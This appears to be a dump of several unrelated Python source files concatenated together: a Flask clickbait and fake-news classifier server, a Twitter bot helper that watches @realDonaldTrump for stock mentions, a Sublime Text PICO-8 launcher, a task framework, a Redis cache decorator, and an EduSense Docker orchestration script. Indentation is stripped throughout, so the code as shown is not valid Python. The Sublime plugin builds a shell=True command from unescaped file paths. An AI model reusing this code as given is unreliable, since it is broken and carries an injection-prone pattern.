print(" * [i] Building Keras models")
global model_clickbait, model_profile, model_toxic, model_subj
model_subj = subjectivity_classifier()
model_clickbait = clickbait_detector()
# article profile/type classifier
model_profile = article_profile_classifier()
load_ML()
def pred_clickbait(input_):
global model_clickbait, data
data["clickbait"] = model_clickbait.predict(input_)
def pred_profile(input_):
global model_profile, data
data["article_profile"] = model_profile.predict(input_)
def pred_subj(input_):
global model_subj, data
data["article_subjectivity"] = model_subj.predict(input_)
data = {"success": False}
@functools.lru_cache(maxsize=512, typed=False)
def download_article(article_url):
article = Article(article_url, fetch_images=False)
article.download()
article.parse()
article_title = article.title
article_text = article.text
image_list = article.images
return article_title, article_text, image_list
@app.route("/predict", methods=["POST"])
def predict():
# initialize the data dictionary that will be returned from the
# view
global model_clickbait, model_profile, model_subj
global data, cr
data = {"success": False}
# get the respective args from the post request
if flask.request.method == "POST":
start_time = time.time()
article_url = flask.request.args.get("article_url")
article_title, article_text, image_list = download_article(article_url)
article_time = time.time()
print(" * [i] Article download time:", round(article_time-start_time, 3), "seconds")
threads = []
if article_text is not None:
t = Thread(target=pred_profile, args=([article_text]))
threads.append(t)
t.start()
t = Thread(target=pred_subj, args=([article_text]))
threads.append(t)
t.start()
if article_title is not None:
article_title = article_title.replace("%20", " ")
print(" * [i] Incoming article title:", article_title)
data["article_title"] = article_title
t = Thread(target=pred_clickbait, args=([article_title]))
threads.append(t)
t.start()
data["claimReview"] = cr.search_fc(article_title)
if image_list is not None:
results = []
# TODO
data["hoax_image_search"] = results
[t.join() for t in threads]
data["success"] = True
print(" * [i] Inference took", round(time.time()-article_time, 3), "seconds")
print(" * [i] Request took", round(time.time()-start_time, 3), "seconds")
# return the data dictionary as a JSON response
return flask.jsonify(data)
# if file was executed by itself, start the server process
if __name__ == "__main__":
print(" * [i] Starting Flask server")
app.run(host='0.0.0.0', port=5000)
|
twitter.py | from json import loads
from os import getenv
from queue import Empty
from queue import Queue
from threading import Event
from threading import Thread
from time import time
from tweepy import API
from tweepy import Cursor
from tweepy import OAuthHandler
from tweepy import Stream
from tweepy.error import TweepError
from tweepy.streaming import StreamListener
from logs import Logs
# The keys for the Twitter account we're using for API requests and tweeting
# alerts (@Trump2Cash). Read from environment variables.
TWITTER_ACCESS_TOKEN = getenv('TWITTER_ACCESS_TOKEN')
TWITTER_ACCESS_TOKEN_SECRET = getenv('TWITTER_ACCESS_TOKEN_SECRET')
# The keys for the Twitter app we're using for API requests
# (https://apps.twitter.com/app/13239588). Read from environment variables.
TWITTER_CONSUMER_KEY = getenv('TWITTER_CONSUMER_KEY')
TWITTER_CONSUMER_SECRET = getenv('TWITTER_CONSUMER_SECRET')
# The user ID of @realDonaldTrump.
TRUMP_USER_ID = '25073877'
# The user ID of @Trump2Cash.
TRUMP2CASH_USER_ID = '812529080998432769'
# The URL pattern for links to tweets.
TWEET_URL = 'https://twitter.com/%s/status/%s'
# Some emoji.
EMOJI_THUMBS_UP = '\U0001f44d'
EMOJI_THUMBS_DOWN = '\U0001f44e'
EMOJI_SHRUG = 'ยฏ\\_(\u30c4)_/ยฏ'
# The maximum number of characters in a tweet.
MAX_TWEET_SIZE = 140
# The number of worker threads processing tweets.
NUM_THREADS = 100
# The maximum time in seconds that workers wait for a new task on the queue.
QUEUE_TIMEOUT_S = 5 * 60
# The number of retries to attempt when an error occurs.
API_RETRY_COUNT = 60
# The number of seconds to wait between retries.
API_RETRY_DELAY_S = 1
# The HTTP status codes for which to retry.
API_RETRY_ERRORS = [400, 401, 500, 502, 503, 504]
class Twitter:
"""A helper for talking to Twitter APIs."""
def __init__(self, logs_to_cloud):
self.logs_to_cloud = logs_to_cloud
self.logs = Logs(name='twitter', to_cloud=self.logs_to_cloud)
self.twitter_auth = OAuthHandler(TWITTER_CONSUMER_KEY,
TWITTER_CONSUMER_SECRET)
self.twitter_auth.set_access_token(TWITTER_ACCESS_TOKEN,
TWITTER_ACCESS_TOKEN_SECRET)
self.twitter_api = API(auth_handler=self.twitter_auth,
retry_count=API_RETRY_COUNT,
retry_delay=API_RETRY_DELAY_S,
retry_errors=API_RETRY_ERRORS,
wait_on_rate_limit=True,
wait_on_rate_limit_notify=True)
self.twitter_listener = None
def start_streaming(self, callback):
"""Starts streaming tweets and returning data to the callback."""
self.twitter_listener = TwitterListener(
callback=callback, logs_to_cloud=self.logs_to_cloud)
twitter_stream = Stream(self.twitter_auth, self.twitter_listener)
self.logs.debug('Starting stream.')
twitter_stream.filter(follow=[TRUMP_USER_ID])
# If we got here because of an API error, raise it.
if self.twitter_listener and self.twitter_listener.get_error_status():
raise Exception('Twitter API error: %s' %
self.twitter_listener.get_error_status())
def stop_streaming(self):
"""Stops the current stream."""
if not self.twitter_listener:
self.logs.warn('No stream to stop.')
return
self.logs.debug('Stopping stream.')
self.twitter_listener.stop_queue()
self.twitter_listener = None
def tweet(self, companies, tweet):
"""Posts a tweet listing the companies, their ticker symbols, and a
quote of the original tweet.
"""
link = self.get_tweet_link(tweet)
text = self.make_tweet_text(companies, link)
self.logs.info('Tweeting: %s' % text)
self.twitter_api.update_status(text)
def make_tweet_text(self, companies, link):
"""Generates the text for a tweet."""
# Find all distinct company names.
names = []
for company in companies:
name = company['name']
if name not in names:
names.append(name)
# Collect the ticker symbols and sentiment scores for each name.
tickers = {}
sentiments = {}
for name in names:
tickers[name] = []
for company in companies:
if company['name'] == name:
ticker = company['ticker']
tickers[name].append(ticker)
sentiment = company['sentiment']
# Assuming the same sentiment for each ticker.
sentiments[name] = sentiment
# Create lines for each name with sentiment emoji and ticker symbols.
lines = []
for name in names:
sentiment_str = self.get_sentiment_emoji(sentiments[name])
tickers_str = ' '.join(['$%s' % t for t in tickers[name]])
line = '%s %s %s' % (name, sentiment_str, tickers_str)
lines.append(line)
# Combine the lines and ellipsize if necessary.
lines_str = '\n'.join(lines)
size = len(lines_str) + 1 + len(link)
if size > MAX_TWEET_SIZE:
self.logs.warn('Ellipsizing lines: %s' % lines_str)
lines_size = MAX_TWEET_SIZE - len(link) - 2
lines_str = '%s\u2026' % lines_str[:lines_size]
# Combine the lines with the link.
text = '%s\n%s' % (lines_str, link)
return text
def get_sentiment_emoji(self, sentiment):
"""Returns the emoji matching the sentiment."""
if not sentiment:
return EMOJI_SHRUG
if sentiment > 0:
return EMOJI_THUMBS_UP
if sentiment < 0:
return EMOJI_THUMBS_DOWN
self.logs.warn('Unknown sentiment: %s' % sentiment)
return EMOJI_SHRUG
def get_tweet(self, tweet_id):
"""Looks up metadata for a single tweet."""
try:
# Use tweet_mode=extended so we get the full text.
status = self.twitter_api.get_status(tweet_id,
tweet_mode='extended')
if not status:
self.logs.error('Bad status response: %s' % status)
return None
except TweepError as e:
self.logs.error('Failed to get status for ID: %s (%s)' % (
tweet_id, e))
return None
# Use the raw JSON, just like the streaming API.
return status._json
def get_all_tweets(self):
"""Looks up metadata for the most recent Trump tweets."""
tweets = []
# Only the 3,200 most recent tweets are available through the API. Use
# the @Trump2Cash account to filter down to the relevant ones.
for status in Cursor(self.twitter_api.user_timeline,
user_id=TRUMP2CASH_USER_ID,
exclude_replies=True).items():
# Extract the quoted @realDonaldTrump tweet, if available.
try:
quoted_tweet_id = status.quoted_status_id
except AttributeError:
self.logs.warn('Skipping tweet: %s' % status)
continue
# Get the tweet details and add it to the list.
quoted_tweet = self.get_tweet(quoted_tweet_id)
if quoted_tweet:
tweets.append(quoted_tweet)
self.logs.debug('Got tweets: %s' % tweets)
return tweets
def get_tweet_text(self, tweet):
"""Returns the full text of a tweet."""
# The format for getting at the full text is different depending on
# whether the tweet came through the REST API or the Streaming API:
# https://dev.twitter.com/overview/api/upcoming-changes-to-tweets
try:
if 'extended_tweet' in tweet:
self.logs.debug('Decoding extended tweet from Streaming API.')
return tweet['extended_tweet']['full_text']
elif 'full_text' in tweet:
self.logs.debug('Decoding extended tweet from REST API.')
return tweet['full_text']
else:
self.logs.debug('Decoding short tweet.')
return tweet['text']
except KeyError:
self.logs.error('Malformed tweet: %s' % tweet)
return None
def get_tweet_link(self, tweet):
"""Creates the link URL to a tweet."""
if not tweet:
self.logs.error('No tweet to get link.')
return None
try:
screen_name = tweet['user']['screen_name']
id_str = tweet['id_str']
except KeyError:
self.logs.error('Malformed tweet for link: %s' % tweet)
return None
link = TWEET_URL % (screen_name, id_str)
return link
class TwitterListener(StreamListener):
"""A listener class for handling streaming Twitter data."""
def __init__(self, callback, logs_to_cloud):
self.logs_to_cloud = logs_to_cloud
self.logs = Logs(name='twitter-listener', to_cloud=self.logs_to_cloud)
self.callback = callback
self.error_status = None
self.start_queue()
def start_queue(self):
"""Creates a queue and starts the worker threads."""
self.queue = Queue()
self.stop_event = Event()
self.logs.debug('Starting %s worker threads.' % NUM_THREADS)
self.workers = []
for worker_id in range(NUM_THREADS):
worker = Thread(target=self.process_queue, args=[worker_id])
worker.daemon = True
worker.start()
self.workers.append(worker)
def stop_queue(self):
"""Shuts down the queue and worker threads."""
# First stop the queue.
if self.queue:
self.logs.debug('Stopping queue.')
self.queue.join()
else:
self.logs.warn('No queue to stop.')
# Then stop the worker threads.
if self.workers:
self.logs.debug('Stopping %d worker threads.' % len(self.workers))
self.stop_event.set()
for worker in self.workers:
# Block until the thread terminates.
worker.join()
else:
self.logs.warn('No worker threads to stop.')
def process_queue(self, worker_id):
"""Continuously processes tasks on the queue."""
# Create a new logs instance (with its own httplib2 instance) so that
# there is a separate one for each thread.
logs = Logs('twitter-listener-worker-%s' % worker_id,
to_cloud=self.logs_to_cloud)
logs.debug('Started worker thread: %s' % worker_id)
while not self.stop_event.is_set():
try:
data = self.queue.get(block=True, timeout=QUEUE_TIMEOUT_S)
start_time = time()
self.handle_data(logs, data)
self.queue.task_done()
end_time = time()
qsize = self.queue.qsize()
logs.debug('Worker %s took %.f ms with %d tasks remaining.' %
(worker_id, end_time - start_time, qsize))
except Empty:
logs.debug('Worker %s timed out on an empty queue.' %
worker_id)
continue
except Exception:
# The main loop doesn't catch and report exceptions from
# background threads, so do that here.
logs.catch()
logs.debug('Stopped worker thread: %s' % worker_id)
def on_error(self, status):
"""Handles any API errors."""
self.logs.error('Twitter error: %s' % status)
self.error_status = status
self.stop_queue()
return False
def get_error_status(self):
"""Returns the API error status, if there was one."""
return self.error_status
def on_data(self, data):
"""Puts a task to process the new data on the queue."""
# Stop streaming if requested.
if self.stop_event.is_set():
return False
# Put the task on the queue and keep streaming.
self.queue.put(data)
return True
def handle_data(self, logs, data):
"""Sanity-checks and extracts the data before sending it to the
callback.
"""
try:
tweet = loads(data)
except ValueError:
logs.error('Failed to decode JSON data: %s' % data)
return
try:
user_id_str = tweet['user']['id_str']
screen_name = tweet['user']['screen_name']
except KeyError:
logs.error('Malformed tweet: %s' % tweet)
return
# We're only interested in tweets from Mr. Trump himself, so skip the
# rest.
if user_id_str != TRUMP_USER_ID:
logs.debug('Skipping tweet from user: %s (%s)' %
(screen_name, user_id_str))
return
logs.info('Examining tweet: %s' % tweet)
# Call the callback.
self.callback(tweet)
|
pico_run_cart.py | import sublime
import sublime_plugin
import subprocess
import threading
class PicoRunCartCommand(sublime_plugin.TextCommand):
def run(self, edit):
def target():
subprocess.Popen(self.cmd, bufsize=-1, stdin=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
pico8 = "\"" + self.view.settings().get("pico-8_path", "undefined") + "\""
if pico8 == "undefined":
sublime.error_message("Error: \"pico-8_path\" is not defined !\n\nRun \"PICO-8: Setup Path\" from the Command Palette.")
return
cart = "\"" + self.view.file_name() + "\""
self.cmd = pico8 + " -run " + cart
threading.Thread(target=target).start()
|
vtask.py | # Copyright (c) 2014, Facebook, Inc. All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
#
"""Base Task and related helper classes for sparts' task system
Tasks in sparts are a way to organize and delegate some sort of
background or other synchronized processing. This module defines
the most common features.
"""
from __future__ import absolute_import
import logging
import six
import threading
from six.moves import xrange
from sparts.sparts import _SpartsObject
from sparts.timer import Timer
class VTask(_SpartsObject):
"""The base class for all tasks. Needs to be subclassed to be useful.
Attributes:
OPT_PREFIX - Overrides the prefix for any associated options
LOOPLESS - True indicates this task should not spawn any threads
DEPS - List of `VTask` subclasses that must be initialized first
workers - Number of Threads that should execute the `_runloop`
"""
OPT_PREFIX = None
LOOPLESS = False
DEPS = []
workers = 1
@property
def name(self):
return self.__class__.__name__
def __init__(self, service):
"""Task Constructor. requires a `service` VService instance
You should not need to override this. Override initTask isntead."""
self.service = service
self.logger = logging.getLogger('%s.%s' % (service.name, self.name))
self.threads = []
def initTask(self):
"""Override this to do any task-specific initialization
Don't forget to call super(...).initTask(), or things may not
run properly."""
if not self.LOOPLESS:
for i in xrange(self.workers):
if self.workers == 1:
name = self.name
else:
name = '%s-%d' % (self.name, i + 1)
self.threads.append(
threading.Thread(target=self._run, name=name))
def initTaskThread(self):
"""Override thread-specific initialization for multi-threaded tasks"""
def start(self):
"""Called during bootstrap to spin up threads post-creation."""
if not self.LOOPLESS:
for thread in self.threads:
thread.start()
def stop(self):
"""Custom stopping logic for this task.
This is called by the main VService thread, after a graceful shutdown
request has been received."""
pass
def join(self):
"""Block, waiting for all child worker threads to finish."""
if not self.LOOPLESS:
for thread in self.threads:
while thread.isAlive():
thread.join(0.5)
@property
def running(self):
"""Returns True if task is still doing work.
This base implementation returns True if any child threads are alive"""
for thread in self.threads:
if thread.isAlive():
return True
return False
def _run(self):
try:
self.initTaskThread()
self._runloop()
except Exception:
# In general, you should not get here. So, we will shutdown the
# server. It is better for your service to *completely* crash in
# response to an unhandled error, than to continue on in some sort
# of half-alive zombie state. Please catch your exceptions.
# Consider throwing a TryLater if this task is a subclass of
# QueueTask or PeriodicTask.
#
# I hate zombies.
self.logger.exception("Unhandled exception in %s", self.name)
self.service.shutdown()
finally:
self.logger.debug('Thread %s exited',
threading.currentThread().name)
def _runloop(self):
"""For normal (non-LOOPLESS) tasks, this MUST be implemented"""
# TODO: May require some janky metaprogramming to make ABC enforce
# this in a cleaner way.
raise NotImplementedError()
@classmethod
def _loptName(cls, name):
return '--' + cls._optName(name).replace('_', '-')
@classmethod
def _optName(cls, name):
parts = [cls.OPT_PREFIX or cls.__name__, name]
return '_'.join(parts).replace('-', '_')
def getTaskOption(self, opt, default=None):
return getattr(self.service.options,
self._optName(opt), default)
def setTaskOption(self, opt, value):
setattr(self.service.options, self._optName(opt), value)
@classmethod
def register(cls):
REGISTERED.register(cls)
class SkipTask(Exception):
"""Throw during initTask() to skip execution of this task.
Useful in case the task is missing configuration critical to its operation,
but not critical to the overall program.
A good example might be a network-based logging task."""
pass
class TryLater(Exception):
"""Throw this in overridden tasks to defer execution.
Can be used to temporarily suspend and restart execution, which is useful
for handling unexpected error conditions, or re-scheduling work.
Will retry the work `after` the number of seconds specified.
"""
def __init__(self, message=None, after=None):
super(TryLater, self).__init__(message)
self.message = message
self.after = after
class ExecuteContext(object):
"""An abstraction used internally by various tasks to track work
Encapsulates common metrics for work that can be retried later, hooks for
signalling completion, etc"""
def __init__(self, attempt=1, item=None, deferred=None, future=None):
self.attempt = attempt
self.item = item
self.deferred = deferred
self.future = future
self.running = threading.Event()
self.timer = Timer()
def start(self):
"""Indicate that execution has started"""
if not self.running.is_set():
if self.future is not None:
self.future.set_running_or_notify_cancel()
self.timer.start()
self.running.set()
def set_result(self, result):
"""Indicate that execution has completed"""
self.timer.stop()
if self.future is not None:
self.future.set_result(result)
if self.deferred is not None:
self.deferred.callback(result)
def set_exception(self, exception):
"""Indicate that execution has failed"""
handled = False
self.timer.stop()
if self.future is not None:
self.future.set_exception(exception)
if self.deferred is not None:
unhandled = []
self.deferred.addErrback(self._unhandledErrback, unhandled)
self.deferred.errback(exception)
if not unhandled:
handled = True
return handled
@property
def elapsed(self):
"""Convenience property. Returns timer duration."""
return self.timer.elapsed
@staticmethod
def _unhandledErrback(error, unhandled):
"""Fallback errback for deferred processing"""
unhandled.append(error)
return None
def __cmp__(self, obj):
"""Custom comparators for comparing contexts' work `item`s"""
lhs, rhs = id(self), obj
if isinstance(obj, ExecuteContext):
lhs, rhs = self.item, obj.item
return cmp(lhs, rhs)
def __lt__(self, obj):
"""Override __lt__ explicitly for priority queue implementations"""
assert isinstance(obj, ExecuteContext)
return self.item < obj.item
def __eq__(self, obj):
assert isinstance(obj, ExecuteContext)
return self.item == obj.item
def __ne__(self, obj):
assert isinstance(obj, ExecuteContext)
return self.item != obj.item
def __gt__(self, obj):
assert isinstance(obj, ExecuteContext)
return self.item > obj.item
class Tasks(object):
"""Collection class for dealing with service tasks.
Tasks can be accessed but accessing them (by name) as attributes, or via
the get/require methods.
"""
def __init__(self, tasks=None):
self.logger = logging.getLogger('sparts.tasks')
self._registered = []
self._registered_names = {}
self._created = []
self._created_names = {}
self._did_create = False
tasks = tasks or []
for t in tasks:
self.register(t)
def register(self, task_class):
"""Register task_class with the collection"""
assert not self._did_create
name = task_class.__name__
if name not in self._registered_names:
# Recursively register dependencies
for dep in task_class.DEPS:
self.register(dep)
self._registered.append(task_class)
self._registered_names[name] = task_class
def register_all(self, tasks):
"""Register multiple `tasks` classes with the collection"""
assert not self._did_create
for task in tasks:
self.register(task)
def unregister(self, task_class):
"""Unregister `task_class` from the collection"""
assert not self._did_create
self._registered.remove(task_class)
del(self._registered_names[task_class.__name__])
def create(self, *args, **kwargs):
"""Create all registered tasks.
TODO: Handle SkipTask?
"""
assert not self._did_create
for task_cls in self._registered:
task = task_cls(*args, **kwargs)
self._created.append(task)
self._created_names[task_cls.__name__] = task
self._did_create = True
def remove(self, task):
"""Remove created `task` from the collection"""
assert self._did_create
self._created.remove(task)
del(self._created_names[task.name])
def init(self):
"""Initialize all created tasks. Remove ones that throw SkipTask."""
assert self._did_create
exceptions = []
skipped = []
for t in self:
try:
t.initTask()
except SkipTask as e:
# Keep track of SkipTasks so we can remove it from this
# task collection
self.logger.info("Skipping %s (%s)", t.name, e)
skipped.append(t)
except Exception as e:
# Log and track unhandled exceptions during init, so we can
# fail later.
self.logger.exception("Error creating task, %s", t.name)
exceptions.append(e)
# Remove any tasks that should be skipped
for t in skipped:
self.remove(t)
# Reraise a new exception, if any exceptions were thrown in init
if len(exceptions):
raise Exception("Unable to start service (%d task start errors)" %
len(exceptions))
def start(self):
"""Start all the tasks, creating worker threads, etc"""
assert self._did_create
for t in self.tasks:
t.start()
def get(self, task):
"""Returns the `task` or its class, if creation hasn't happened yet."""
if isinstance(task, six.string_types):
name = task
else:
assert issubclass(task, VTask)
name = task.__name__
if self._did_create:
return self._created_names.get(name)
else:
return self._registered_names.get(name)
def require(self, task):
"""Return the `task` instance or class, raising if not found."""
result = self.get(task)
if result is None:
raise KeyError('%s not in tasks (%s|%s)' %
(task, self.task_classes, self.tasks))
return result
@property
def task_classes(self):
"""Accessor for accessing a copy of registered task classes"""
return self._registered[:]
@property
def tasks(self):
"""Accessor for accessing a registered or instantiated task classes
Return value varies based on whether `create()` has been called."""
if self._did_create:
return self._created[:]
else:
return self.task_classes
def __getattr__(self, name):
"""Helper for accessing tasks using their name as an attribute."""
return self.require(name)
def __iter__(self):
"""Iterates on created or registered tasks, as appropriate."""
return iter(self.tasks)
def __len__(self):
"""Returns the number of created or registered tasks, as appropriate"""
return len(self.tasks)
def __getitem__(self, index):
"""Returns the created or registered task at the specified `index`"""
return self.tasks[index]
# This `Tasks` collection tracks globally registered tasks.
REGISTERED = Tasks()
|
cached.py | from datetime import datetime, timedelta
from css_html_js_minify import html_minify
import os
import threading
import redis
import web
redis_client = redis.from_url(os.environ.get("REDIS_URL"))
class cached(object):
def __init__(self, *args, **kwargs):
self.path_cache_time = {}
self.default_max_age = kwargs.get("default_cache_max_age", timedelta(seconds=int(os.environ['CACHE_AGE'])))
def __refresh_function_param(self, func, path, async, *args, **kwargs):
def do_refresh():
res = func(*args, **kwargs)
page = str(res)
page = html_minify(page)
redis_client.set(path, page)
self.path_cache_time[path] = datetime.now()
if async:
threading.Thread(target=do_refresh).start()
else:
do_refresh()
def __call__(self, func):
def inner(*args, **kwargs):
path = web.ctx.get('path')
max_age = kwargs.get('max_age', self.default_max_age)
is_cached = redis_client.exists(path)
reload_cache = True
if path in self.path_cache_time:
reload_cache = (datetime.now() - self.path_cache_time[path] > max_age)
else:
self.path_cache_time[path] = datetime.now()
if not is_cached or reload_cache:
if 'max_age' in kwargs:
del kwargs['max_age']
self.__refresh_function_param(func, path, is_cached, *args, **kwargs)
return redis_client.get(path)
return inner
|
run_backfill.py | #!/usr/bin/python3
import argparse
import json
import os
import sys
import subprocess
import tempfile
import time
import threading
def get_parameters(run_command):
uid = os.getuid()
gid = os.getgid()
app_username = os.getenv("APP_USERNAME", "")
app_password = os.getenv("APP_PASSWORD", "")
#Loading storage server version name
if run_command == 'run_backfill.py':
file_location = '../storage/version.txt'
f = open(file_location, 'r')
else:
try:
file_location = '/' + run_command.strip('script/run_backfill.py') + '/storage/version.txt'
f = open(file_location, 'r')
except:
file_location = run_command.strip('script/run_backfill.py') + '/storage/version.txt'
f = open(file_location, 'r')
version = f.read()
version = version.strip('\n')
#Getting current user
process = subprocess.Popen(['whoami'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
developer = stdout.decode('utf-8')[:-1]
return uid, gid, app_username, app_password, version, developer
def kill_all_containers():
print('killing all containers')
process = subprocess.Popen(['docker', 'container', 'kill'] + containers,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
lock.acquire()
killed_container_ids = stdout.decode('utf-8').split()
for c in killed_container_ids:
print('killed container', c)
print(stderr)
print("\n")
lock.release()
def wait_container(container):
process = subprocess.Popen([
'docker', 'container', 'wait',
container],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
process = subprocess.Popen([
'docker', 'inspect', container, "--format='{{.State.ExitCode}}'"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
status=stdout.decode('utf-8')
## print is not thread-safe
## acquire a lock
lock.acquire()
print(container_dict[container],"exited with status code",status)
## remove the container from global list and dict
## in a thread-safe way
containers.remove(container)
del container_dict[container]
## release lock
lock.release()
lock=threading.Lock()
## a global list of container id's
containers=[]
container_dict={}
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='EduSense deploy video')
parser.add_argument('--front_video', dest='front_video', type=str, nargs='?',
required=True, help='video file for front ip camera')
parser.add_argument('--developer', dest='dev', type=str, nargs='?',
required=True, help='enter developer tag name')
parser.add_argument('--back_video', dest='back_video', type=str, nargs='?',
required=True, help='video for back ip camera')
parser.add_argument('--keyword', dest='keyword', type=str, nargs='?',
required=True, help='Keyword for class session')
parser.add_argument('--backend_url', dest='backend_url', type=str, nargs='?',
required=True, help='EduSense backend address')
parser.add_argument('--front_num_gpu_start', dest='front_num_gpu_start', type=int, nargs='?',
required=True, help='GPU start index for front camera processing')
parser.add_argument('--front_num_gpu', dest='front_num_gpu', type=int, nargs='?',
required=True, help='number of GPUs for front camera processing')
parser.add_argument('--back_num_gpu_start', dest='back_num_gpu_start', type=int, nargs='?',
required=True, help='GPU start index for back camera processing')
parser.add_argument('--back_num_gpu', dest='back_num_gpu', type=int, nargs='?',
required=True, help='number of GPUs for back camera processing')
parser.add_argument('--time_duration', dest='time_duration', type=int, nargs='?',
required=True, help='time duration for executing CI')
parser.add_argument('--video_schema', dest='video_schema', type=str, nargs='?',
required=True, help='video schema for CI')
parser.add_argument('--audio_schema', dest='audio_schema', type=str, nargs='?',
required=True, help='audio schema for CI')
parser.add_argument('--timeout', dest='timeout', type=int, nargs='?',
help='timeout for the script',default=7200)
parser.add_argument('--log_dir', dest='log_dir' ,type=str, nargs='?',
help='get the logs in a directory')
parser.add_argument('--video_dir', dest='video_dir', type=str, nargs='?',
required=True, help='directory for video')
parser.add_argument('--process_real_time', dest='process_real_time',
action='store_true', help='if set, skip frames to keep'
' realtime')
parser.add_argument('--tensorflow_gpu', dest='tensorflow_gpu', type=str, nargs='?',
default='-1', help='tensorflow gpus')
parser.add_argument('--overwrite', dest='overwrite', type=str, nargs='?', default='False',
help='To enable overwriting previous backfilled session, enter: True')
args = parser.parse_args()
uid, gid, app_username, app_password, version, developer = get_parameters(sys.argv[0])
#Calling sessions API endpoint
process = subprocess.Popen([
'curl',
'-X', 'POST',
'-d', '{\"developer\": \"%s\", \"version\": \"%s\", \"keyword\": \"%s\", \"overwrite\": \"%s\"}' % (developer, version, args.keyword, args.overwrite),
'--header', 'Content-Type: application/json',
'--basic', '-u', '%s:%s' % (app_username, app_password),
'https://%s/sessions' % args.backend_url],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
print(stdout)
try:
output = json.loads(stdout.decode('utf-8'))
success = output['success']
session_id = output['session_id'].strip()
except:
print("Unable to create a session")
print("check APP username and password")
sys.exit(1)
print('created session', session_id)
real_time_flag = ['--process_real_time'] if args.process_real_time \
else []
# create temp directory
with tempfile.TemporaryDirectory() as tmp_dir:
if args.log_dir == None:
args.log_dir=tmp_dir
print('create temporary directory', tmp_dir)
process = subprocess.Popen([
'docker', 'run','-d',
'--gpus','all',
'-e', 'LOCAL_USER_ID=%s' % uid,
'-e', 'APP_USERNAME=%s' % app_username,
'-e', 'APP_PASSWORD=%s' % app_password,
'-v', '%s:/app/source' %args.video_dir,
'-v', '%s:/tmp' % args.log_dir,
'edusense/video:'+args.dev,
'--video',os.path.join('/app', 'source', args.front_video),
'--video_sock', '/tmp/unix.front.sock',
'--backend_url', args.backend_url,
'--session_id', session_id,
'--schema', args.video_schema,
'--use_unix_socket',
'--keep_frame_number',
'--gaze_3d',
'--process_gaze',
'--profile',
'--time_duration', str(args.time_duration + 60) if args.time_duration >= 0 else '-1'] + real_time_flag,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
front_video_container_id = stdout.decode('utf-8').strip()
containers.append(front_video_container_id)
container_dict[front_video_container_id]='front video container'
print('created front video container', front_video_container_id)
process = subprocess.Popen([
'docker', 'run', '-d',
'--gpus','all',
'-e', 'LOCAL_USER_ID=%s' % uid,
'-e', 'APP_USERNAME=%s' % app_username,
'-e', 'APP_PASSWORD=%s' % app_password,
'-v', '%s:/tmp' % args.log_dir,
'-v', '%s:/app/source' %args.video_dir,
'edusense/video:'+args.dev,
'--video',os.path.join('/app', 'source', args.back_video),
'--video_sock', '/tmp/unix.back.sock',
'--backend_url', args.backend_url,
'--session_id', session_id,
'--schema', args.video_schema,
'--use_unix_socket',
'--keep_frame_number',
'--time_duration', str(args.time_duration + 60) if args.time_duration >= 0 else '-1',
'--gaze_3d',
'--process_gaze',
'--profile',
'--instructor'] + real_time_flag,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
back_video_container_id = stdout.decode('utf-8').strip()
containers.append(back_video_container_id)
container_dict[back_video_container_id]='back video container'
print('created back video container', back_video_container_id)
time.sleep(30)
process = subprocess.Popen([
'nvidia-docker', 'run', '-d',
'-e', 'LOCAL_USER_ID=%s' % uid,
'-v', '%s:/tmp' %args.log_dir,
'-v', '%s:/app/video' % args.video_dir,
'edusense/openpose:'+args.dev,
'--video', os.path.join('/app', 'video', args.front_video),
'--num_gpu_start', str(args.front_num_gpu_start),
'--num_gpu', str(args.front_num_gpu),
'--use_unix_socket',
'--unix_socket', os.path.join('/tmp', 'unix.front.sock'),
'--display', '0',
'--render_pose', '0',
'--raw_image'] + real_time_flag,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
front_openpose_container_id = stdout.decode('utf-8').strip()
containers.append(front_openpose_container_id)
container_dict[front_openpose_container_id]='front openpose container'
print('created front openpose container', front_openpose_container_id)
process = subprocess.Popen([
'nvidia-docker', 'run', '-d',
'-e', 'LOCAL_USER_ID=%s' % uid,
'-v', '%s:/tmp' %args.log_dir,
'-v', '%s:/app/video' % args.video_dir,
'edusense/openpose:'+args.dev,
'--video', os.path.join('/app', 'video', args.back_video),
'--num_gpu_start', str(args.back_num_gpu_start),
'--num_gpu', str(args.back_num_gpu),
'--use_unix_socket',
'--unix_socket', os.path.join('/tmp', 'unix.back.sock'),
'--display', '0',
'--render_pose', '0',
'--raw_image'] + real_time_flag,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
back_openpose_container_id = stdout.decode('utf-8').strip()
containers.append(back_openpose_container_id)
container_dict[back_openpose_container_id]='back openpose container'
print('created back openpose container', back_openpose_container_id)
process = subprocess.Popen([
'docker', 'run', '-d',
'-e', 'LOCAL_USER_ID=%s' % uid,
'-e', 'APP_USERNAME=%s' % app_username,
'-e', 'APP_PASSWORD=%s' % app_password,
'-v', '%s:/app/video' % args.video_dir,
'-v', '%s:/tmp' % args.log_dir,
'edusense/audio:'+args.dev,
'--front_url', os.path.join('/app', 'video', args.front_video),
'--back_url', os.path.join('/app', 'video', args.back_video),
'--backend_url', args.backend_url,
'--session_id', session_id,
'--time_duration', str(args.time_duration + 60) if args.time_duration >= 0 else '-1',
'--schema', args.audio_schema],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
audio_container_id = stdout.decode('utf-8').strip()
containers.append(audio_container_id)
container_dict[audio_container_id]='audio container'
print('created audio container', audio_container_id,'\n\n')
## the script can be kept running and dockers will be killed after timeout seconds
timer = threading.Timer(args.timeout, kill_all_containers)
timer.start()
## make seperate threads for containers
threads=[]
for container in containers:
t=threading.Thread(target=wait_container,args=[container])
t.start()
threads.append(t)
## join the threads
for thread in threads:
thread.join()
## cancel the killing thread execution
timer.cancel()
|
test_cloudpickle.py | #!/usr/bin/env python
